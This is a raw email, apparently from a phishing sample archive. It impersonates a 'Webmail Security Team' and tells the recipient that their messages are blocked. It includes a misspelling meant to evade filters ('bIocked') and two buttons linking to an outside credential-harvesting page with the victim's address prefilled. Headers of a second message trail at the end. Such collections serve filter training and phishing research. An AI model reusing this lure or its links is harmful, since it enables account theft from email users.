From: Webmail Security Team <no-reply-privilage@server.lym-mx.com>,
To: jose@monkey.org
Subject: monkey.org important pending messages
Date: 05 Dec 2019 00:58:52 -0800
Message-ID: <20191205005852.04E938A87450A7CD@server.lym-mx.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-PMX-Version: 6.4.7.2805085, Antispam-Engine: 2.7.2.2107409, Antispam-Data: 2019.12.5.84816, AntiVirus-Engine: 5.68.0, AntiVirus-Data: 2019.12.5.5680000
Status: O
X-Status: 
X-Keywords:                  
X-UID: 222

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.10570.1001"></HEAD>
<body style=3D"MARGIN: 0.5em">&nbsp;
<DIV style=3D'FONT-SIZE: 11px; BORDER-TOP: 0px; FONT-FAMILY: "Lucida Grande=
",Verdana,Arial,Helvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0p=
x; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE=
: normal; PADDING-TOP: 0px; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(2=
44,248,245); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant=
-caps: normal; text-decoration-style: initial; text-decoration-color: initi=
al'>
<DIV style=3D"BORDER-TOP: 0px; WIDTH: 1013px; FLOAT: left; PADDING-BOTTOM: =
5px; PADDING-TOP: 5px; MARGIN-LEFT: 18px; PADDING-RIGHT: 5px">
<DIV style=3D'FONT-SIZE: 13px; BORDER-TOP: 0px; FONT-FAMILY: wf_segoe-ui_no=
rmal,"Segoe UI","Segoe WP",Tahoma,Arial,sans-serif; PADDING-TOP: 0px; BACKG=
ROUND-COLOR: rgb(244,248,245)'><SPAN>Message generated from monkey.org sour=
ce.</SPAN></DIV></DIV></DIV>
<DIV style=3D'FONT-SIZE: 11px; FONT-FAMILY: "Lucida Grande",Verdana,Arial,H=
elvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM=
: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; LETTER-=
SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font=
-variant-ligatures: normal; font-variant-caps: normal; text-decoration-styl=
e: initial; text-decoration-color: initial'>&nbsp;</DIV>
<DIV style=3D'FONT-SIZE: 11px; FONT-FAMILY: "Lucida Grande",Verdana,Arial,H=
elvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM=
: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; LETTER-=
SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font=
-variant-ligatures: normal; font-variant-caps: normal; text-decoration-styl=
e: initial; text-decoration-color: initial'>&nbsp;</DIV>
<table style=3D"FONT-SIZE: 11px; MAX-WIDTH: 600px; FONT-FAMILY: &quot;Lucid=
a Grande&quot;,Verdana,Arial,Helvetica,sans-serif; WHITE-SPACE: normal; WOR=
D-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51=
); FONT-STYLE: normal; MARGIN-LEFT: auto; LETTER-SPACING: normal; BACKGROUN=
D-COLOR: rgb(255,255,255); MARGIN-RIGHT: auto; TEXT-INDENT: 0px; font-varia=
nt-ligatures: normal; font-variant-caps: normal; text-decoration-style: ini=
tial; text-decoration-color: initial" cellspacing=3D"0" cellpadding=3D"0" b=
order=3D"0">
<TBODY>
<TR>
<td>
<table style=3D"MAX-WIDTH: 900px; BORDER-TOP: rgb(224,224,224) 1px solid; B=
ORDER-RIGHT: rgb(224,224,224) 1px solid; BORDER-BOTTOM-WIDTH: 0px; MIN-WIDT=
H: 600px; BORDER-BOTTOM-COLOR: ; BORDER-LEFT: rgb(224,224,224) 1px solid; b=
order-top-left-radius: 3px; border-top-right-radius: 3px" cellspacing=3D"0"=
 cellpadding=3D"0" width=3D"100%" bgcolor=3D"#005167" border=3D"0">
<TBODY>
<TR>
<td height=3D"72" colspan=3D"3">&nbsp;</TD></TR>
<TR>
<td width=3D"32">&nbsp;</TD>
<td style=3D"FONT-SIZE: 27px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,s=
ans-serif; COLOR: rgb(255,255,255); LINE-HEIGHT: 1.25">You have some pendin=
g messages</TD>
<td width=3D"32">&nbsp;</TD></TR>
<TR>
<td height=3D"19" colspan=3D"3">&nbsp;</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<td>
<table style=3D"MAX-WIDTH: 900px; BORDER-RIGHT: rgb(240,240,240) 1px solid;=
 BORDER-TOP-COLOR: ; MIN-WIDTH: 600px; BORDER-BOTTOM: rgb(192,192,192) 1px =
solid; BORDER-LEFT: rgb(240,240,240) 1px solid; BORDER-TOP-WIDTH: 0px; bord=
er-bottom-left-radius: 3px; border-bottom-right-radius: 3px" cellspacing=3D=
"0" cellpadding=3D"0" width=3D"100%" bgcolor=3D"#fafcff" border=3D"0">
<TBODY>
<TR>
<td rowspan=3D"3" width=3D"32">&nbsp;</TD>
<td>&nbsp;</TD>
<td rowspan=3D"3" width=3D"32">&nbsp;</TD></TR>
<TR>
<td height=3D"220">
<table style=3D"MIN-WIDTH: 300px" cellspacing=3D"0" cellpadding=3D"0" borde=
r=3D"0">
<TBODY>
<TR>
<td style=3D"FONT-SIZE: 13px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,s=
ans-serif; COLOR: rgb(255,255,255); LINE-HEIGHT: 1.5" width=3D"473">&nbsp;<=
/TD></TR>
<TR>
<td style=3D"FONT-SIZE: 16px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,s=
ans-serif; COLOR: rgb(32,32,32); LINE-HEIGHT: 1.5">Your emails on<SPAN> </S=
PAN><FONT color=3Dblue><U>jose@monkey.org</U></FONT><SPAN> </SPAN>have been=
 bIocked due to authentication error in your domain.<BR><BR>Get all emails =
unblocked by following below buttons.<BR><BR></TD></TR>
<TR>
<td style=3D"FONT-SIZE: 14px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,s=
ans-serif; COLOR: rgb(32,32,32); LINE-HEIGHT: 1.5">
<A style=3D"TEXT-DECORATION: none; BACKGROUND: rgb(0,81,103); FLOAT: left; =
COLOR: rgb(255,255,255); PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-L=
EFT: 0px; DISPLAY: block; PADDING-RIGHT: 0px" href=3D"http://riceland-inti.=
com/wayne/rcube19?email=3Djose@monkey.org" rel=3Dnoreferrer target=3D_blank=
=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://scienceaudit=
service.com/classes/work/rcube19?email%3D%5B%5B-Recipient-%5D%5D&amp;source=
=3Dgmail&amp;ust=3D1575462830752000&amp;usg=3DAFQjCNGu7nJXLTmFz__iqnActgfce=
NzuKQ"><B>RELEASE&nbsp; MESSAGES&nbsp;&nbsp;</B></A>
<A style=3D"TEXT-DECORATION: none; BACKGROUND: rgb(60,60,60); FLOAT: left; =
COLOR: rgb(255,255,255); PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-L=
EFT: 0px; DISPLAY: block; PADDING-RIGHT: 0px" href=3D"http://riceland-inti.=
com/wayne/rcube19?email=3Djose@monkey.org" rel=3Dnoreferrer target=3D_blank=
=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://scienceaudit=
service.com/classes/work/rcube19?email%3D%5B%5B-Recipient-%5D%5D&amp;source=
=3Dgmail&amp;ust=3D1575462830752000&amp;usg=3DAFQjCNGu7nJXLTmFz__iqnActgfce=
NzuKQ"><B>PREVIEW HERE::..&nbsp;&nbsp;</B></A><BR><BR></TD></TR>
<TR>
<td>
<P>&nbsp;</P>&nbsp;</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD=
></TR>
<TR>
<td style=3D"FONT-SIZE: 10px; MAX-WIDTH: 900px; FONT-FAMILY: Roboto-Regular=
,Helvetica,Arial,sans-serif; COLOR: rgb(188,188,188); LINE-HEIGHT: 1.5">&nb=
sp;</TD></TR>
<TR>
<td>
<table style=3D"FONT-SIZE: 16px; FONT-FAMILY: Roboto-Regular,Helvetica,Aria=
l,sans-serif; COLOR: rgb(102,102,102); PADDING-BOTTOM: 10px; LINE-HEIGHT: 1=
8px">
<TBODY>
<TR>
<td>Copy right inc monkey.org &copy; 2019: We are here to serve you better.=
</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></HTML>

From jose@monkey.org Sat Dec  7 18:31:59 2019 +0000
Return-Path: info@pcapservices.com
Delivered-To: jose@monkey.org
X-FDA: 76239189558.08.glue45_4b766cfefbe1f
X-Spam-Summary: 75,0,0,0b0646f1dd5c9ceb,d41d8cd98f00b204,info@pcapservices.com,:,RULES_HIT:72:327:355:375:379:455:962:967:973:978:982:983:988:989:1189:1208:1224:1260:1311:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1513:1515:1516:1517:1521:1571:1588:1589:1710:1714:1730:1747:1777:1792:2198:2199:2393:2525:2527:2561:2565:2610:2682:2685:2693:2859:2902:2933:2937:2939:2942:2945:2947:2951:2954:3022:3040:3138:3139:3140:3141:3142:3148:3350:3650:3867:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:5007:6096:6261:6300:6669:6674:6678:8518:8603:8829:8957:9025:9416:9908:10004:10346:11026:11657:11914:12043:12213:12219:12297:12438:12555:12740:12895:12956:12958:12959:12973:12986:13139:13374:14096:14596:14829:21080:21325:21347:21349:21407:21433:21451:21524:21554:21627:21790:21810:21819:21881:21939:30054:30070:30075:30090,0,RBL:153.120.11.189-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral
X-HE-Tag: glue45_4b766cfefbe1f
X-Filterd-Recvd-Size: 34370
Received: from www.wajo-holdings.jp (wajo-holdings.jp [153.120.11.189])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat,  7 Dec 2019 18:31:58 +0000 (UTC)
Received: from pcapservices.com (unknown [5.135.73.106])
	by www.wajo-holdings.jp (Postfix) with ESMTPA id 9B89F25835CE
	for <jose@monkey.org>; Sun,  8 Dec 2019 03:31:55 +0900 (JST)
